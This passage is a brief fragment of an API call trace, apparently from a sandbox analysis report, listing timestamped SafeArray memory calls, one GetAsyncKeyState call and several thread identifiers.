SafeArrayDestroyData (psa=0xc98bda0) returned 0x0 [0112.975] SafeArrayAllocData (psa=0xc98bda0) returned 0x0 [0112.975] GetAsyncKeyState (vKey=3) returned 0 [0112.975] SafeArrayDestroyData (psa=0xc98bda0) returned 0x0 [0112.975] SafeArrayDestroyDescriptor (psa=0xc98bda0) returned 0x0 Thread: id = 17 os_tid = 0xc84 Thread: id = 18 os_tid = 0xc7c Thread: id = 19 os_tid = 0xc6c Thread: id = 20 os_tid = 0x398 Thread: id = 21 os_tid = 0xc10